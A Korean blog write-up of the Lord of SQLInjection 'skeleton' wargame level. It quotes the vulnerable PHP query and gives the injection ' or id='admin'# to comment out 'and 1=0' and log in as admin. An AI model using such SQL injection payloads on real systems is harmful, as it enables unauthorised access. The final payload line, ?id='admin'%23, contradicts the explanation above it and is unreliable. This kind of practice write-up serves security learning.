Lord of SQLInjection - 10번 : skeleton

문제 스포 : 주석을 활용하는 문제

문제 살펴보기

query를 보면 1=0으로 모든 where문을 거짓으로 만드는 것을 볼 수 있다.

이걸 없애는게 목적인 문제인 것 같다.

$query = "select id from prob_skeleton where id='guest' and pw='{$_GET[pw]}' and 1=0";
...
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if($result['id'] == 'admin') solve("skeleton");

해당 select문이 id='admin'인 행을 반환하게 하면 풀리는 문제이다.

상당히 간단하네요. 바로 풀어보도록 합시다.

문제 풀이 과정

pw 파라미터에 ' or id='admin'# 을 넣어주게 되면

and 1=0을 주석처리 하고 select문이 id='admin'인 행을 반환하게 된다.

고민할 필요도 없는 문제이니 바로 clear 하도록 합시다.

페이로드 : ?id='admin'%23

바로 다음 문제를 풀러 갑시다.

'web > Lord of SQLInjection' 카테고리의 다른 글

Lord of SQLInjection - 12번 : darkknight (1)	2023.12.10
Lord of SQLInjection - 11번 : golem (0)	2023.12.10
Lord of SQLInjection - 9번 : vampire (0)	2023.12.10
Lord of SQLInjection - 8번 : troll (0)	2023.12.10
Lord of SQLInjection - 7번 : orge (1)	2023.12.10

보안 바보 탈출기

Lord of SQLInjection - 10번 : skeleton

문제 살펴보기

문제 풀이 과정

'web > Lord of SQLInjection' 카테고리의 다른 글

티스토리툴바

Lord of SQLInjection - 10번 : skeleton

문제 살펴보기

문제 풀이 과정

'web > Lord of SQLInjection' 카테고리의 다른 글

'web/Lord of SQLInjection' Related Articles

티스토리툴바